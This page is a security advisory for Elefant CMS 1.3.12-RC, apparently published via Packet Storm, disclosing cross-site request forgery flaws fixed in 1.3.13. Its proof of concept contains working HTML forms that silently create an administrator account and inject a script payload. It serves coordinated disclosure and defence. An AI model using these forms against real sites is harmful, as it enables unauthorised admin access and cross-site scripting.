exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Elefant CMS 1.3.12-RC Cross Site Request Forgery

Elefant CMS 1.3.12-RC Cross Site Request Forgery
Posted Feb 17, 2017
Authored by Tim Coen | Site curesec.com

Elefant CMS version 1.3.12-RC suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
SHA-256 | de7243db48cddd6c808e1a9eacb1044d56649c1f9f4181acc839a3c6a756964e

Elefant CMS 1.3.12-RC Cross Site Request Forgery

Change Mirror Download
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Elefant CMS 1.3.12-RC
Fixed in: 1.3.13
Fixed Version https://github.com/jbroadway/elefant/releases/tag/
Link: elefant_1_3_13_rc
Vendor Website: https://www.elefantcms.com/
Vulnerability CSRF
Type:
Remote Yes
Exploitable:
Reported to 09/05/2016
vendor:
Disclosed to 02/02/2017
public:
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits Tim Coen of Curesec GmbH

2. Overview

Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to cross site request forgery. If a victim visits a website that
contains specifically crafted code while logged into Elefant, an attacker can
for example create a new admin account without the victims knowledge.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

There is no CSRF protection for various components, allowing among other the
creation of new admin accounts or XSS attacks.

Proof of Concept:

Create New Admin: <html> <body> <form action="http://localhost/user/add" method
="POST"> <input type="hidden" name="name" value="admin3" /> <input type=
"hidden" name="email" value="admin3@example.com" /> <input type="hidden" name=
"password" value="admin3" /> <input type="hidden" name="verify_pass" value=
"admin3" /> <input type="hidden" name="type" value="admin" /> <input type=
"hidden" name="company" value="" /> <input type="hidden" name="title" value=""
/> <input type="hidden" name="website" value="" /> <input type="hidden" name=
"photo" value="" /> <input type="hidden" name="about" value="" /> <input type=
"hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" />
<input type="hidden" name="address" value="" /> <input type="hidden" name=
"address2" value="" /> <input type="hidden" name="city" value="" /> <input type
="hidden" name="state" value="" /> <input type="hidden" name="country" value=""
/> <input type="hidden" name="zip" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html> XSS: <html> <body> <form action=
"http://localhost/designer/preview" method="POST"> <input type="hidden" name=
"layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html

--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-StraAe 54
10365 Berlin, Germany


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close